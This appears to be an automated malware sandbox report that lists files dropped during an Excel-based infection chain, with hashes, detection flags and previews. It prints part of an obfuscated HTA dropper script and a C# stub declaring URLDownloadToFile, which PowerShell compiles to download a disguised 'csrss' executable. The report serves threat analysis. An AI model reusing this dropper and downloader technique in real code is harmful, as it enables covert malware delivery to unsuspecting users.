                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):64
                Entropy (8bit):0.34726597513537405
                Encrypted:false
                SSDEEP:3:Nlll:Nll
                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                Malicious:false
                Preview:@...e...........................................................

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\gdfvr[1].hta

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:HTML document, ASCII text, with very long lines (65498), with CRLF line terminators
                Category:modified
                Size (bytes):155101
                Entropy (8bit):2.413658699503682
                Encrypted:false
                SSDEEP:768:tZ6A3yXNA0AGAJUm7TggPjM1LhT7OgPgKf/Yg5QiXAZO:tPcp7we
                MD5:2C663F0E924C1B0773B65541F610DC2F
                SHA1:B6684F3EE0E305913B7B638F640CDB8A9BD7E3EF
                SHA-256:7D605835426F27A6FD60B5180B82F2B30AB498C860CF3CBB28B1D3FB32C58042
                SHA-512:501A33112CD28B8033A29562FF4B76DD9E57E49E7D848775FD5D3554E8B18C44A8B9AA459C61A529A9E556DFD73F154B15AC1DF475BBABF87E6335F051E3D6D3
                Malicious:true
                Yara Hits:
                • Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\gdfvr[1].hta, Author: Joe Security
                Preview:<Script Language='Javascript'>.. ..document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%4A%61%76%61%53%63%72%69%70%74%3E%6D%3D%27%25%33%43%25%32%31%44%4F%43%54%59%50%45%25%32%30%68%74%6D%6C%25%33%45%25%30%41%25%33%43%6D%65%74%61%25%32%30%68%74%74%70%2D%65%71%75%69%76%25%33%44%25%32%32%58%2D%55%41%2D%43%6F%6D%70%61%74%69%62%6C%65%25%32%32%25%32%30%63%6F%6E%74%65%6E%74%25%33%44%25%32%32%49%45%25%33%44%45%6D%75%6C%61%74%65%49%45%38%25%32%32%25%32%30%25%33%45%25%30%41%25%33%43%68%74%6D%6C%25%33%45%25%30%41%25%33%43%62%6F%64%79%25%33%45%25%30%41%25%33%43%53%63%72%49%70%74%25%32%30%54%59%50%65%25%33%44%25%32%32%74%45%58%54%2F%76%42%73%63%52%69%50%74%25%32%32%25%33%45%25%30%41%64%49%4D%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\csrss[1].exe

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                Category:dropped
                Size (bytes):2673152
                Entropy (8bit):7.219441527091625
                Encrypted:false
                SSDEEP:49152:Og7eO7kjTav5AwVZGsY3uS+s1vm1lvt+vU0JSziMwqM:j7lmmUM7wq
                MD5:4FB3E6E7B8F9C12CD2D5E161F7B94760
                SHA1:57BDAD62C6EA7F1B905C900302F918D185811A94
                SHA-256:F76F9B85DF2BA8850BEC058164D2C752C8FD8EF0F1BCFFD793E5F453D8A839BB
                SHA-512:F762AD1CCD537D06C1CF3538E433671F441F100B06D37EC34B3A3E76DFBFAD40AC7CA50EE32297C54F628B0B89D75C2C5255166CC992F9BCFF8F117F70AA179A
                Malicious:true
                Antivirus:
                • Antivirus: Virustotal, Detection: 22%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`...$n.K$n.K$n.K..J-n.K..J(n.K..J.n.K-.*K*n.Ko..J-n.K$n.K.n.K...J/n.K...J`n.K$n.K%n.K7.J%n.K7.FK%n.K7.J%n.KRich$n.K........PE..d...m.f.........."....(.....B.................@............................../...........`...........................................%.X...H.%......0(.......&..8............/.<...P.".T.....................".(.....".@...............0............................text...h........................... ..`.managed.q...0...r.................. ..`hydrated`................................rdata..&H.......J..................@..@.data.........&.."..................@....pdata...8....&..:..................@..@.rsrc........0(.......!.............@..@.reloc..<...../.......(.............@..B................................................................................................................................................................

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json

                Download File
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                File Type:JSON data
                Category:dropped
                Size (bytes):962
                Entropy (8bit):5.013811273052389
                Encrypted:false
                SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                Malicious:false
                Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\379F14B3.emf

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):3267664
                Entropy (8bit):4.082704780373106
                Encrypted:false
                SSDEEP:12288:A1J5JK5z3QGnjhjIwguslwv2WXKcnXfxp6ZamUknaN9HRo1tWwE1qCD8dt3iGnjF:An5qz3YwyaGb1swEwCat3wwKuWh1OwG
                MD5:F9C857D816E009A9156490C428628ED4
                SHA1:9DB00D7B2DFDDB8E9F27A405F5648E50F38B426E
                SHA-256:748FF1D68ABB7C846A6523DA96CFC391F4157BEEDECE2154442DE656D208B4D9
                SHA-512:56CCAD7C8B4223F314206F3624A6B72F951EC7BF9E0FB3290AF1FC5914A394F98740F1BFEA205253FBBB236359B56A96244F605BFD892AAC7A81FE6504D85068
                Malicious:false
                Preview:....l...........-...s...........!?..3X.. EMF....P.1.w...7...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'................3f.....%....................3f.....................................L...d...4...f...7...{...4...f...........!..............?...........?................................'.......................%...........(.......................L...d...............................$...!..............?...........?................................'...

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3ACE5F18.emf

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):3115944
                Entropy (8bit):3.99329520179585
                Encrypted:false
                SSDEEP:12288:Y1XKPI5R32GnjPjIwcusrwvsWXKcnXfxpMZacUkRaN7Hjo1PWw6D8dt3iGnjPjIp:YdKOR30wOSKx1Ow6at3wwKuWh1Own
                MD5:FBBB8E9329014CA73ED2E670C8853EFD
                SHA1:2F0AEDA9EAB65719760250474A879619E4FBB24D
                SHA-256:F16E8FFEFB183EB65B9EDC76BD56C3CCEA0D0E21743D5B771C8965D58BCCAA55
                SHA-512:1DA3B868B682608BB76A38B2FE3AF65ADEDD9775A7A824A495E595C6117F46D679AF6CC6ABD1835E47E0F270F51AA8D2BCE7562249CE7B81951B9D20F0C89A9F
                Malicious:false
                Preview:....l...........-...r...........QN...a.. EMF....../.C...)...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\85C1546B.emf

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):3268792
                Entropy (8bit):4.078124759248305
                Encrypted:false
                SSDEEP:12288:x1E5MT523tGnjmjIwgusmwvpWXKcnXfxp7ZaTUkmaNoHko1CWwf1ExD8dt3iGnju:xi5e23gwyqyK1Bwf6xat3wwKuWh1Ow9
                MD5:D6E4983047BA5360C7AA0AABB151AD23
                SHA1:D3065FF6710DCE2EB4979BDBAAB0D827C3C90658
                SHA-256:0539F341B361AE77722D7E39B2201B420906261AD4A9204F026E990A060A6444
                SHA-512:31593D79E5DEE108800A2778451E31298EA5E7848340116CB5EE1D614707F4832C984BD5CCFD35E99BBDBD457177CD1A49764B77C90D9E03E3A3FDB417BD53D2
                Malicious:false
                Preview:....l...........u................D...`.. EMF......1.{...6.......................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................#..."...........!...................................................#..."...........!...................................................#..."...........!...................................................#...'................3f.....%....................3f.....................................L...d.......R.......c.......R...........!..............?...........?................................'.......................%...........(.......................L...d...................................!..............?...........?................................'...

                C:\Users\user\AppData\Local\Temp\2shkkccg.cfp.ps1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1

                C:\Users\user\AppData\Local\Temp\5cxhwuvg.2ql.psm1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1

                C:\Users\user\AppData\Local\Temp\RESC41B.tmp

                Download File
                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Jul 26 07:30:05 2024, 1st section name ".debug$S"
                Category:dropped
                Size (bytes):1328
                Entropy (8bit):4.008737946689376
                Encrypted:false
                SSDEEP:24:HUe9E2UspV3dHtwKdNWI+ycuZhNTakS1PNnqSqd:02VNuKd41ulTa3vqSK
                MD5:AB52A44E1DBD12392D65CF748BDF6840
                SHA1:179AE224D9B694B9FD611E765878F51F45F2505D
                SHA-256:4B10C74D10FF27B79DDC411D1EEF73935B5389B06F3E8F203FCF73CFF20BF8B5
                SHA-512:0E9FD76D70D7E067EF9CE34E4BBB18907F5AF3C398AD4C6F8558650491385CC94E6924B2A6E2D4847E8B106F9C2AAA082993E0AC34FE8581A659664C7CC6756E
                Malicious:false
                Preview:L...}P.f.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\ofvwqfjd\CSC42CCF8E8871B428699CAD148D9BC26FF.TMP.................oI..iK.<..............4.......C:\Users\user\AppData\Local\Temp\RESC41B.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.f.v.w.q.f.j.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                C:\Users\user\AppData\Local\Temp\RESC9F.tmp

                Download File
                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Jul 26 07:30:24 2024, 1st section name ".debug$S"
                Category:dropped
                Size (bytes):1328
                Entropy (8bit):3.973537964768451
                Encrypted:false
                SSDEEP:24:H/e9EurU/RHRwKdNwI+ycuZhNjakS1PNnqSqd:mr8RaKdm1ulja3vqSK
                MD5:0E036F24B59072DA73D83AF4564C9C48
                SHA1:A46A86CF7742C8E5A01ED5BC3C0E931C768EB41F
                SHA-256:A962C4A9DC49C87FB6B5FF850AC98A58DCBABCDF66645E71F71C98C38E4CB716
                SHA-512:8852CC7A7602A5430B72007FF1D07F7286763509A83C9416A17D172C7E64B21F7DB054C4CB473D0F46C862F85AB1FAD5777C42A7E40CA6773432511A9D90EC57
                Malicious:false
                Preview:L....P.f.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\ge3s1wmx\CSCB36078EA61014130AC1261969F8319D.TMP.................T....8oh`.`W}"4..........3.......C:\Users\user\AppData\Local\Temp\RESC9F.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...g.e.3.s.1.w.m.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                C:\Users\user\AppData\Local\Temp\d4cyswwi.q0u.psm1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1

                C:\Users\user\AppData\Local\Temp\ge3s1wmx\CSCB36078EA61014130AC1261969F8319D.TMP

                Download File
                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                File Type:MSVC .res
                Category:dropped
                Size (bytes):652
                Entropy (8bit):3.1115540893862033
                Encrypted:false
                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryxak7Ynqq1PN5Dlq5J:+RI+ycuZhNjakS1PNnqX
                MD5:D554E2139BA0386F6860D660577D2234
                SHA1:4A32BA16DDF55937A94434DEDDF5BE61993916B3
                SHA-256:710CF5805F2D308F77F945DF898759DC6116C3C5D645C99EBF161CFE04B688AB
                SHA-512:7B74A03169A510E03F99A3DEF399F92FA00E6F6A4E2CC4B0E135FA2B671E626035F8A4D1D0ADBBAC6D3C3A53DB6ED5D446EF60DAB704003C74626C4319EE9863
                Malicious:false
                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...g.e.3.s.1.w.m.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...g.e.3.s.1.w.m.x...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.0.cs

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (343)
                Category:dropped
                Size (bytes):456
                Entropy (8bit):3.792698188963493
                Encrypted:false
                SSDEEP:6:V/DsYLDS81zuSH0bMGffQXReKJ8SRHy4HiBSrYC9Zf/cy5RBEwdKy:V/DTLDfu8NXfHesUgZfEy5R6y
                MD5:D92562BB10C45A8479C6F2CA27D4AAD2
                SHA1:BF719A03FAF19275B3B660779EB3CFDBDA6D4ED5
                SHA-256:3D8E3A49C0BAADE4D70A96B0BC4C30053324AAF4564EDAC2FC547AA1AD123A83
                SHA-512:4C8FDDB52B3032872EEB96DA904AE6040CCF542526BE4DAF53EBDAB975DC9400B38D0153DDA5DD0DA4D1D372F2711D6617BE05F6B7208CB46603FC6F1C95DC39
                Malicious:false
                Preview:.using System;.using System.Runtime.InteropServices;..namespace yAjTPtp.{. public class db. {. [DllImport("urlmon", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr rMXvyTlVqF,string o,string PCg,uint kFvGXqEtgN,IntPtr Hx);.. }..}.

                C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.cmdline

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                Category:dropped
                Size (bytes):369
                Entropy (8bit):5.243328085731964
                Encrypted:false
                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fOWUi1JUzxs7+AEszIP23fOWUit:p37Lvkmb6KzxdJUWZEoxF
                MD5:ABA44177075CED1F024E448C732F78D6
                SHA1:515169E3A5F072586BBC5FF7595AD976E2E83C86
                SHA-256:BCFC515D4E30459E54753B23793CF589E719AF7FEE0ECA688DA70DA4E81DE80B
                SHA-512:7DA3349D183D3F8BE21793441FAAA6E0F5CC6BB16A6724179BBDF6BE85301C275130ECE4B27CBF142FAACB1F9DEB8CA3CF67183716807051B4C33DD301CDFAC4
                Malicious:false
                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.0.cs"

                C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.dll

                Download File
                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):3072
                Entropy (8bit):2.8152291486162806
                Encrypted:false
                SSDEEP:24:etGStJ2J2F8y7vUWukDqZCa0lxjqHRDtkZflVC+WI+ycuZhNjakS1PNnqI:6eUecVIClxjqxiJlVCl1ulja3vqI
                MD5:CC34C9F6E5F6C738AA77D61927BE692B
                SHA1:5B4666C41D24068E25BFBCCD6D3F0D45BADDED71
                SHA-256:508B5459D88240D555F2AF6D865BF2C7D89350277EEBBE74C5CD3799D7956DF0
                SHA-512:F8D1C444A04E25F96590ECBB8C1A72969D8EE49F26E6ADB31EA5521390E2F007670A13000C9A97D206B5F4F6A041FDE0196B200CDBA052A92E547485D6854E80
                Malicious:true
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....P.f...........!.................#... ...@....... ....................................@.................................P#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................2.+.....p.....p.......................................... 9.....P ......K.........Q.....\.....^.....b.....m...K.....K...!.K.....K.......!.....*.......9......................................."..........<Module>.ge

                C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.out

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                Category:modified
                Size (bytes):866
                Entropy (8bit):5.335894104439047
                Encrypted:false
                SSDEEP:24:AId3ka6Kzv/EoqKaMD5DqBVKVrdFAMBJTH:Akka60v/EoqKdDcVKdBJj
                MD5:9B3FB45D00474A20D24AC07AB7FBDA74
                SHA1:BF5D059B8B06F1B1720ACD40F4A6EBDE8923D943
                SHA-256:55D8F5A4FF01EA33C66102CF280A3750159392E9CBAA5841571BE3F5BC99A17A
                SHA-512:CA22022D632390015EF1C28926E671BAF68BA9EB91AC92F3FCB5E2DBD223487B21C9390434D6EBD0B23068890B9CF2EE9B3E8089574D157B78FD09DA3BD6A8C6
                Malicious:false
                Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                C:\Users\user\AppData\Local\Temp\ofvwqfjd\CSC42CCF8E8871B428699CAD148D9BC26FF.TMP

                Download File
                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                File Type:MSVC .res
                Category:dropped
                Size (bytes):652
                Entropy (8bit):3.117766434260039
                Encrypted:false
                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryhak7Ynqq1PN5Dlq5J:+RI+ycuZhNTakS1PNnqX
                MD5:85EC6F49CAF295BA694B993C0FB08FFC
                SHA1:B015D920D64D3E1E7244D2D8316FC64709BF96D3
                SHA-256:A7882C2B6742B4461A67CCD8388626A49E25C718815CBA14F87E5A02EEEAD51C
                SHA-512:5F889E48AD8252EE9BACD13D50475C0AA1DBEAFFE78A1D09246D9D0AD42D894E6BDC1FE1BF979548F94419674AC395E9F61E2A692965404B553981F4B66819E5
                Malicious:false
                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.f.v.w.q.f.j.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...o.f.v.w.q.f.j.d...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.0.cs

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (343)
                Category:dropped
                Size (bytes):456
                Entropy (8bit):3.792698188963493
                Encrypted:false
                SSDEEP:6:V/DsYLDS81zuSH0bMGffQXReKJ8SRHy4HiBSrYC9Zf/cy5RBEwdKy:V/DTLDfu8NXfHesUgZfEy5R6y
                MD5:D92562BB10C45A8479C6F2CA27D4AAD2
                SHA1:BF719A03FAF19275B3B660779EB3CFDBDA6D4ED5
                SHA-256:3D8E3A49C0BAADE4D70A96B0BC4C30053324AAF4564EDAC2FC547AA1AD123A83
                SHA-512:4C8FDDB52B3032872EEB96DA904AE6040CCF542526BE4DAF53EBDAB975DC9400B38D0153DDA5DD0DA4D1D372F2711D6617BE05F6B7208CB46603FC6F1C95DC39
                Malicious:false
                Preview:.using System;.using System.Runtime.InteropServices;..namespace yAjTPtp.{. public class db. {. [DllImport("urlmon", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr rMXvyTlVqF,string o,string PCg,uint kFvGXqEtgN,IntPtr Hx);.. }..}.

                C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                Category:dropped
                Size (bytes):369
                Entropy (8bit):5.29055883369608
                Encrypted:false
                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fyQ/wzxs7+AEszIP23fyQ/CAn:p37Lvkmb6KzNYWZEoNV
                MD5:AD10F7C12BAED4FA659152D5700DA72C
                SHA1:A9EB49EDF27D77233207F1E092F402656F448C70
                SHA-256:ADC907B376C5065186EB6F7ADB484A0F24CF58E9FDC79292415110FFF896B082
                SHA-512:7DCD87623BCE49BE5900DC817EA0046B1AE6998D486FDC61313C9E5433B1940D18842C38873D218A3489DE05B52D2A7F0C7359F03FF39874BC3031713922F589
                Malicious:true
                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.0.cs"

                C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.dll

                Download File
                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):3072
                Entropy (8bit):2.820054014397794
                Encrypted:false
